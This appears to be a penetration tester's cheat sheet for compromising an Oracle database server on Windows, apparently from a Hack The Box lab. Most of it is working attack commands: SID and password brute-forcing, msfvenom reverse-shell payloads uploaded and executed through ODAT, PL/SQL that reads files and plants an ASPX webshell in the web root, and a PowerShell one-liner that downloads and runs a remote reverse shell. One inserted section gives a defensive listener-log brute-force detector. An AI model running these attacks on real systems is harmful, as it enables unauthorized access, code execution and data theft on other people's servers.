# Oracle

## Scan

```
80     http IIS httpd 8.5
1521   oracle-tns 11.2.0.2.0 (unauthorized)
49160  oracletns listener (requires service name)
```

## nmap

* Found the SID

```
nmap -Pn -n -sV -p1521 --script=oracle* 10.x.x.x -e tun0

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
|
| oracle-sid-brute:
|_  XE   
```

## hydra

* Can find the SID too

```
hydra -L sids-oracle.txt -s 1521 10.10.10.82 oracle-sid
```

## Oracle Client and ODAT Setup

* <https://github.com/quentinhardy/odat>
* <https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html>

```
git clone https://github.com/quentinhardy/odat
cd odat
git submodule init
git submodule update
sudo apt-get install libaio1 python-dev alien python-pip

oracle-instantclient-basic-base    .. download 64-bit rpm
oracle-instantclient-basic-sqlplus .. download 64-bit rpm
oracle-instantclient-devel         .. download 64-bit rpm

sudo alien --to-deb *.rpm          .. convert to deb (if you need)
dpkg -i *.deb                      .. install

vim /etc/profile                   .. bunch of edits (ref: ODAT)
export ORACLE_HOME ...
export LD_LIBRARY_PATH ...
export PATH=...

sql         ..<tab>                .. reopen terminal and try
sqlplus64   ..works!

pip2 install cx_Oracle             .. may also need this
```

## Oracle SID

* Find the SID with odat or metasploit

```
--------------------------
--------------------------
odat.py -h
odat.py sidguesser -h
odat.py sidguesser -s 10.x.x.x -p 1521
python3 odat.py sidguesser -s 10.x.x.x -p 1521 --sids-file /usr/share/odat/sids.txt
found 'XE', 'XEXDB'


--------------------------
--------------------------
msfconsole
search oracle
use auxiliary/scanner/oracle/sid_brute
set RHOSTS 10.x.x.x
run
found 'XE', 'XEXDB'

search scanner/oracle
use auxiliary/scanner/oracle/oracle_login
set RHOSTS 10.x.x.x
set SID XE       ..default
set RPORT 1521   ..the option is RPORT (single port)
run              ..error 'closed'
```

## Oracle Pass

* Need the SID for this to work
* odat defaults:
  * Port: 1521
  * odat/accounts/accounts.txt
* Oracle Default Creds:
  * <https://docs.oracle.com/cd/A97630_01/win.920/a95490/username.htm>

```
--------------------------
--------------------------
odat.py passwordguesser -h
odat.py passwordguesser -s 10.x.x.x -d XE
odat.py passwordguesser -s 10.x.x.x -d XE -p 1521 --accounts-file myusers.txt

Normal:
cat odat/accounts/accounts.txt               ..problem: all UPPERCASE

--------------------------
--------------------------
Metasploit has a better file:
locate oracle_default_userpass               ..mixture upper/lower
cp oracle_default_userpass.txt accounts.txt  ..overwrite odat's list
vim accounts.txt                             ..format differs: msf uses 'user pass', odat wants 'user/pass'
:%s/ /\//g                                   ..vim substitute (not sed): replace the space with '/'

--------------------------
--------------------------
user: scott                                  ..Found!
pass: tiger
```
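SID guessing (nmap oracle-sid-brute, hydra, odat sidguesser, msf sid_brute) and the password guessing above both leave a trace in the listener log: every connect is written with the client address, the requested SID and a return code (12505 when the listener does not know that SID). The following is an added example, not part of the original notes, that runs such a check over a constructed listener.log excerpt; the sample lines and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed listener.log excerpt (not from the page): 10.10.14.31 cycles
# SIDs (return code 12505 = listener does not know that SID), then opens
# repeat connections to XE; 10.10.10.50 is a normal application client.
SAMPLE_LOG = """\
17-MAY-2024 10:01:02 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=45120)) * establish * ORCL * 12505
17-MAY-2024 10:01:02 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=45121)) * establish * PROD * 12505
17-MAY-2024 10:01:02 * (CONNECT_DATA=(SID=DEV)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=45122)) * establish * DEV * 12505
17-MAY-2024 10:01:03 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=45123)) * establish * XE * 0
17-MAY-2024 10:01:09 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=python)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.31)(PORT=45130)) * establish * XE * 0
17-MAY-2024 10:05:00 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.50)(PORT=51002)) * establish * XE * 0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* \(CONNECT_DATA=.*?"
    r"\((?:SID|SERVICE_NAME)=(?P<sid>[^)]*)\).*?\(ADDRESS=.*?\(HOST=(?P<host>[^)]+)\)"
    r".*?\* establish \* \S+ \* (?P<rc>\d+)\s*$"
)

def parse_listener_log(text):
    """Yield (timestamp, client_host, requested_sid, return_code) per establish line."""
    for line in text.splitlines():
        if m := LINE_RE.match(line):
            ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
            yield ts, m["host"], m["sid"], int(m["rc"])

def find_bruteforce(text, sid_threshold=3, burst_threshold=5, window_s=60):
    """Flag hosts with >= sid_threshold rejected distinct SIDs (SID guessing) or
    >= burst_threshold connects in window_s seconds (password guessing: the listener
    logs each connect; the ORA-01017 failures themselves land in the DB audit trail)."""
    by_host = defaultdict(list)
    for ts, host, sid, rc in parse_listener_log(text):
        by_host[host].append((ts, sid, rc))
    alerts = {}
    for host, evs in by_host.items():
        reasons = []
        unknown = {sid for _, sid, rc in evs if rc == 12505}
        if len(unknown) >= sid_threshold:
            reasons.append(f"sid-guessing: {len(unknown)} unknown SIDs rejected")
        evs.sort(key=lambda e: e[0])
        for i, (t0, _, _) in enumerate(evs):  # sliding window over the sorted events
            n = sum(1 for t, _, _ in evs[i:] if (t - t0).total_seconds() <= window_s)
            if n >= burst_threshold:
                reasons.append(f"connect-burst: {n} connects within {window_s}s")
                break
        if reasons:
            alerts[host] = reasons
    return alerts
```

Run it against the real `listener.log` under `$ORACLE_BASE/diag/tnslsnr/<host>/listener/trace/` (location is an assumption for your install) and tune the thresholds to the normal connect rate of the application.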

## Login with sqlplus

```
sqlplus64 scott/tiger@10.10.10.82:1521/XE
sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba

select * from session_privs;
select * from user_role_privs;
exit
```

## ODAT Upload and Execute

* Requires: SID, User, Pass, Venom

```
--------------------------
utlfile (upload)

msfvenom -p windows/shell_reverse_tcp -f exe lhost=10.10.14.31 lport=4444 -o shell.exe
python3 odat.py utlfile -s 10.x.x.x -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --putFile /temp shell.exe /htb/Silo/shell.exe

--------------------------
externaltable (execute)

python3 odat.py externaltable -s 10.x.x.x -p 1521 -U "scott" -P "tiger" -d XE -n -t --sysdba --exec /temp shell.exe
nc -nvlp 4444
system!
```

## ODAT (with MSF)

* Quick Method:
* Straight to 'system' with ODAT

```
--------------------------
odat.py -h
odat.py utlfile -h       ..upload/download/delete
odat.py externaltable -h ..read/execute files/scripts

--------------------------
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=9002 -f exe -o venom.exe

odat.py utlfile -s $IP -d XE \
  -U scott -P tiger \
  --sysdba \
  --putFile /temp venom.exe ../venom.exe

--------------------------
msfconsole  ..setup listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 9002
run

--------------------------
odat.py externaltable -s $IP -d XE \
  -U scott -P tiger \
  --sysdba \
  --exec /temp venom.exe

--------------------------
mtp> getuid
system
```

## Read a File - with sqlplus

* You will need SID, User, Pass, sysdba privs

```
Login:
sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba

SQL> set serveroutput ON   ..needed before running, or dbms_output prints nothing

declare
  f utl_file.file_type;
  s varchar2(200);   -- holds one line; a line longer than 200 chars raises VALUE_ERROR
begin
  -- a raw path only works when utl_file_dir allows it (e.g. '*'); otherwise INVALID_PATH
  f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
  -- f := utl_file.fopen('/root', 'root.txt', 'R');   -- optional alternative target
  utl_file.get_line(f, s);
  utl_file.fclose(f);
  dbms_output.put_line(s);
end;
/                      ..a lone slash runs the block; prints the first line (up to 200 chars)
flag!!
```

## Make a File - with sqlplus

```
SQL>

declare
  f utl_file.file_type;
  s varchar2(5000) := 'Hello Friends';
begin
  -- fopen's optional 4th arg is max_linesize (default 1024 bytes, max 32767);
  -- put_line fails on a line longer than that
  f := utl_file.fopen('/inetpub/wwwroot', 'helloworld.txt', 'W');
  utl_file.put_line(f, s);
  utl_file.fclose(f);
end;
/                      ..Successfully Completed


http://10.x.x.x/helloworld.txt  ..Worked!
Hello Friends
```

## Make a Webshell - with sqlplus

```
--------------------------
--------------------------
locate aspx$
mkdir shells
cd shells
cp cmdasp.aspx .

wc -c cmdasp.aspx              ..1400 (too long: utl_file.fopen defaults to max_linesize 1024 bytes)
vi cmdasp.aspx                 ..clean it up
sed -z 's/\n//g' cmdasp.aspx   ..remove newline chars (prints to stdout; the file is unchanged)
wc -c cmdasp.aspx              ..1358
vi cmdasp.aspx                 ..clean it up further:
<head>                         ..remove
style="..."                    ..remove
<!--comments-->                ..remove

sed -z 's/\n//g' cmdasp.aspx | wc -c  ..991 good
copy the resulting one-liner and paste it into the string literal below
(any single quote inside it must be doubled: ' becomes '')

--------------------------
--------------------------
SQL>

declare
  f utl_file.file_type;
  -- paste the one-line cmdasp.aspx here; single quotes inside it are written as ''
  s varchar2(5000) := 'Paste your oneline cmdasp.aspx here';
begin
  -- default max_linesize is 1024 bytes, so the 991-byte one-liner fits
  f := utl_file.fopen('/inetpub/wwwroot', 'evilcmd.aspx', 'W');
  utl_file.put_line(f, s);
  utl_file.fclose(f);
end;
/                             .. Success


http://10.x.x.x/evilcmd.aspx  .. Worked!
whoami        .. execute!
whoami /all   .. see everyone
```

## Webshell: Reverse PowerShell

```
--------------------
locate nishang shell
cp Invoke-PowerShellTcp.ps1 .
mkdir www
mv Invoke-PowerShellTcp.ps1 www/rev.ps1
vim rev.ps1
Add as the last line of the script:
Invoke-PowerShellTcp -Reverse -IPAddress 10.x.x.x -Port 4444
python -m SimpleHTTPServer    ..to share rev.ps1

--------------------
http://10.x.x.x/evilcmd.aspx
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.x.x.x/rev.ps1')"

--------------------
nc -nvlp 4444                       .. listen
PS C:\windows>                      .. Reverse shell!
PS> cd C:\Users\Phineas\Desktop
PS> dir
PS> Get-Content "Oracle Issue.txt"  .. to read a file in Powershell
```

## Enumerate the listener version

* Interesting. Didn't use this though.

```
tnscmd10g version -p 1521 -h 10.x.x.x
tnscmd10g status -h 10.x.x.x
tnscmd10g status -h 10.x.x.x --10G
```

